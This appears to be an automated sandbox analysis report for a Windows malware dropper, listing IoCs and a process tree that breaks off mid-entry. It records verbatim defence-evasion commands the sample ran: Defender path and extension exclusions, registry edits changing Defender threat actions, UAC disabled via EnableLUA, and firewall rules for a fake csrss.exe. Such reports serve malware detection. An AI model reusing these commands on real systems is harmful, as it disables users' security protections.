2776	iFQ3i4zTragG5MkMNJmom56V.exe
4108	zeo5zozOaxuOySqtFMn9rWZ4.exe
4108	zeo5zozOaxuOySqtFMn9rWZ4.exe
1680	Pct74ve8YCYTcYkmbkRGjd5g.exe
1680	Pct74ve8YCYTcYkmbkRGjd5g.exe
5508	powershell.exe
5508	powershell.exe
5392	powershell.exe
5392	powershell.exe
5376	powershell.exe
5376	powershell.exe
5400	powershell.exe
5400	powershell.exe
5384	powershell.exe
5384	powershell.exe
5392	powershell.exe
5384	powershell.exe
5400	powershell.exe
5508	powershell.exe
5376	powershell.exe
5716	powershell.exe
5716	powershell.exe
5736	powershell.exe
5736	powershell.exe
5736	powershell.exe
5716	powershell.exe
4540	powershell.exe
4540	powershell.exe
4540	powershell.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5604	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
540	zeo5zozOaxuOySqtFMn9rWZ4.exe
540	zeo5zozOaxuOySqtFMn9rWZ4.exe
2416	23q9cthFtmRYAO9RwfXtM5UM.exe
2416	23q9cthFtmRYAO9RwfXtM5UM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	2252	regsvcs.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	912	23q9cthFtmRYAO9RwfXtM5UM.exe
Token: SeDebugPrivilege	2776	iFQ3i4zTragG5MkMNJmom56V.exe
Token: SeImpersonatePrivilege	912	23q9cthFtmRYAO9RwfXtM5UM.exe
Token: SeImpersonatePrivilege	2776	iFQ3i4zTragG5MkMNJmom56V.exe
Token: SeDebugPrivilege	4108	zeo5zozOaxuOySqtFMn9rWZ4.exe
Token: SeImpersonatePrivilege	4108	zeo5zozOaxuOySqtFMn9rWZ4.exe
Token: SeDebugPrivilege	1680	Pct74ve8YCYTcYkmbkRGjd5g.exe
Token: SeImpersonatePrivilege	1680	Pct74ve8YCYTcYkmbkRGjd5g.exe
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeDebugPrivilege	5392	powershell.exe
Token: SeDebugPrivilege	5376	powershell.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeDebugPrivilege	5384	powershell.exe
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeDebugPrivilege	5736	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeIncreaseQuotaPrivilege	5508	WMIC.exe
Token: SeSecurityPrivilege	5508	WMIC.exe
Token: SeTakeOwnershipPrivilege	5508	WMIC.exe
Token: SeLoadDriverPrivilege	5508	WMIC.exe
Token: SeSystemProfilePrivilege	5508	WMIC.exe
Token: SeSystemtimePrivilege	5508	WMIC.exe
Token: SeProfSingleProcessPrivilege	5508	WMIC.exe
Token: SeIncBasePriorityPrivilege	5508	WMIC.exe
Token: SeCreatePagefilePrivilege	5508	WMIC.exe
Token: SeBackupPrivilege	5508	WMIC.exe
Token: SeRestorePrivilege	5508	WMIC.exe
Token: SeShutdownPrivilege	5508	WMIC.exe
Token: SeDebugPrivilege	5508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5508	WMIC.exe
Token: SeRemoteShutdownPrivilege	5508	WMIC.exe
Token: SeUndockPrivilege	5508	WMIC.exe
Token: SeManageVolumePrivilege	5508	WMIC.exe
Token: 33	5508	WMIC.exe
Token: 34	5508	WMIC.exe
Token: 35	5508	WMIC.exe
Token: 36	5508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5508	WMIC.exe
Token: SeSecurityPrivilege	5508	WMIC.exe
Token: SeTakeOwnershipPrivilege	5508	WMIC.exe
Token: SeLoadDriverPrivilege	5508	WMIC.exe
Token: SeSystemProfilePrivilege	5508	WMIC.exe
Token: SeSystemtimePrivilege	5508	WMIC.exe
Token: SeProfSingleProcessPrivilege	5508	WMIC.exe
Token: SeIncBasePriorityPrivilege	5508	WMIC.exe
Token: SeCreatePagefilePrivilege	5508	WMIC.exe
Token: SeBackupPrivilege	5508	WMIC.exe
Token: SeRestorePrivilege	5508	WMIC.exe
Token: SeShutdownPrivilege	5508	WMIC.exe
Token: SeDebugPrivilege	5508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5508	WMIC.exe
Token: SeRemoteShutdownPrivilege	5508	WMIC.exe
Token: SeUndockPrivilege	5508	WMIC.exe
Token: SeManageVolumePrivilege	5508	WMIC.exe
Token: 33	5508	WMIC.exe
Token: 34	5508	WMIC.exe
Token: 35	5508	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe
3904	u2zo.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 4572	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	85
PID 4856 wrote to memory of 4572	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	85
PID 4856 wrote to memory of 3556	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	87
PID 4856 wrote to memory of 3556	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	87
PID 4856 wrote to memory of 3556	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	87
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88
PID 4856 wrote to memory of 2076	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	89
PID 4856 wrote to memory of 2076	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	89
PID 4856 wrote to memory of 2076	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	89
PID 2252 wrote to memory of 3876	2252	regsvcs.exe	96
PID 2252 wrote to memory of 3876	2252	regsvcs.exe	96
PID 2252 wrote to memory of 3876	2252	regsvcs.exe	96
PID 2252 wrote to memory of 2776	2252	regsvcs.exe	98
PID 2252 wrote to memory of 2776	2252	regsvcs.exe	98
PID 2252 wrote to memory of 2776	2252	regsvcs.exe	98
PID 2252 wrote to memory of 4108	2252	regsvcs.exe	97
PID 2252 wrote to memory of 4108	2252	regsvcs.exe	97
PID 2252 wrote to memory of 4108	2252	regsvcs.exe	97
PID 2252 wrote to memory of 1680	2252	regsvcs.exe	99
PID 2252 wrote to memory of 1680	2252	regsvcs.exe	99
PID 2252 wrote to memory of 1680	2252	regsvcs.exe	99
PID 2252 wrote to memory of 912	2252	regsvcs.exe	100
PID 2252 wrote to memory of 912	2252	regsvcs.exe	100
PID 2252 wrote to memory of 912	2252	regsvcs.exe	100
PID 3876 wrote to memory of 4004	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	101
PID 3876 wrote to memory of 4004	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	101
PID 3876 wrote to memory of 4004	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	101
PID 4108 wrote to memory of 1596	4108	zeo5zozOaxuOySqtFMn9rWZ4.exe	104
PID 4108 wrote to memory of 1596	4108	zeo5zozOaxuOySqtFMn9rWZ4.exe	104
PID 4108 wrote to memory of 1596	4108	zeo5zozOaxuOySqtFMn9rWZ4.exe	104
PID 1680 wrote to memory of 3632	1680	Pct74ve8YCYTcYkmbkRGjd5g.exe	131
PID 1680 wrote to memory of 3632	1680	Pct74ve8YCYTcYkmbkRGjd5g.exe	131
PID 1680 wrote to memory of 3632	1680	Pct74ve8YCYTcYkmbkRGjd5g.exe	131
PID 2776 wrote to memory of 4032	2776	iFQ3i4zTragG5MkMNJmom56V.exe	106
PID 2776 wrote to memory of 4032	2776	iFQ3i4zTragG5MkMNJmom56V.exe	106
PID 2776 wrote to memory of 4032	2776	iFQ3i4zTragG5MkMNJmom56V.exe	106
PID 912 wrote to memory of 2416	912	23q9cthFtmRYAO9RwfXtM5UM.exe	127
PID 912 wrote to memory of 2416	912	23q9cthFtmRYAO9RwfXtM5UM.exe	127
PID 912 wrote to memory of 2416	912	23q9cthFtmRYAO9RwfXtM5UM.exe	127
PID 2252 wrote to memory of 4528	2252	regsvcs.exe	112
PID 2252 wrote to memory of 4528	2252	regsvcs.exe	112
PID 3876 wrote to memory of 3904	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	113
PID 3876 wrote to memory of 3904	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	113
PID 3876 wrote to memory of 3904	3876	nzdZVAzy9neJhn8ydaNXrKn4.exe	113
PID 2252 wrote to memory of 3156	2252	regsvcs.exe	128
PID 2252 wrote to memory of 3156	2252	regsvcs.exe	128
PID 2252 wrote to memory of 3156	2252	regsvcs.exe	128
PID 2252 wrote to memory of 4708	2252	regsvcs.exe	129
PID 2252 wrote to memory of 4708	2252	regsvcs.exe	129
PID 2252 wrote to memory of 4708	2252	regsvcs.exe	129
PID 3156 wrote to memory of 3632	3156	gwpEgkgV1c8yxV8wk0CZ9pf7.exe	131
PID 3156 wrote to memory of 3632	3156	gwpEgkgV1c8yxV8wk0CZ9pf7.exe	131
PID 3156 wrote to memory of 3632	3156	gwpEgkgV1c8yxV8wk0CZ9pf7.exe	131
PID 4708 wrote to memory of 4328	4708	y5ehIzpWgSNs1PgS6tel86nE.exe	133
PID 4708 wrote to memory of 4328	4708	y5ehIzpWgSNs1PgS6tel86nE.exe	133
PID 4708 wrote to memory of 4328	4708	y5ehIzpWgSNs1PgS6tel86nE.exe	133
PID 4328 wrote to memory of 888	4328	Install.exe	134

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
"C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe"
1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  PID:3556
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Users\Admin\Pictures\nzdZVAzy9neJhn8ydaNXrKn4.exe
    "C:\Users\Admin\Pictures\nzdZVAzy9neJhn8ydaNXrKn4.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\u2zo.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u2zo.0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4004
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 2032
        5⤵
        Program crash
        
        PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\u2zo.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u2zo.1.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3904
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 960
      4⤵
      Program crash
      PID:2744
- - C:\Users\Admin\Pictures\zeo5zozOaxuOySqtFMn9rWZ4.exe
    "C:\Users\Admin\Pictures\zeo5zozOaxuOySqtFMn9rWZ4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4108
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1596
  - - C:\Users\Admin\Pictures\zeo5zozOaxuOySqtFMn9rWZ4.exe
      "C:\Users\Admin\Pictures\zeo5zozOaxuOySqtFMn9rWZ4.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:540
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6768
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:7020
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5420
- - C:\Users\Admin\Pictures\iFQ3i4zTragG5MkMNJmom56V.exe
    "C:\Users\Admin\Pictures\iFQ3i4zTragG5MkMNJmom56V.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4032
  - - C:\Users\Admin\Pictures\iFQ3i4zTragG5MkMNJmom56V.exe
      "C:\Users\Admin\Pictures\iFQ3i4zTragG5MkMNJmom56V.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:1840
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6840
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5860
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6436
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3748
- - C:\Users\Admin\Pictures\Pct74ve8YCYTcYkmbkRGjd5g.exe
    "C:\Users\Admin\Pictures\Pct74ve8YCYTcYkmbkRGjd5g.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3632
  - - C:\Users\Admin\Pictures\Pct74ve8YCYTcYkmbkRGjd5g.exe
      "C:\Users\Admin\Pictures\Pct74ve8YCYTcYkmbkRGjd5g.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:1240
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6848
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1436
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6404
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6980
- - C:\Users\Admin\Pictures\23q9cthFtmRYAO9RwfXtM5UM.exe
    "C:\Users\Admin\Pictures\23q9cthFtmRYAO9RwfXtM5UM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2416
  - - C:\Users\Admin\Pictures\23q9cthFtmRYAO9RwfXtM5UM.exe
      "C:\Users\Admin\Pictures\23q9cthFtmRYAO9RwfXtM5UM.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2416
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6816
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3672
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:4540
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6300
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6776
- - C:\Users\Admin\Pictures\MjEh43PKin7fzW9jTjb4sn2m.exe
    "C:\Users\Admin\Pictures\MjEh43PKin7fzW9jTjb4sn2m.exe"
    3⤵
    - Modifies firewall policy service
    - Windows security bypass
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4528
- - C:\Users\Admin\Pictures\gwpEgkgV1c8yxV8wk0CZ9pf7.exe
    "C:\Users\Admin\Pictures\gwpEgkgV1c8yxV8wk0CZ9pf7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\7zS90F5.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:3632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:1728
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:5156
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:5168
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:5244
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:5260
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:5336
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:5352
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5696
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:5988
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:6184
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:5308
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5288
      - C:\Windows\SysWOW64\cmd.exe
        
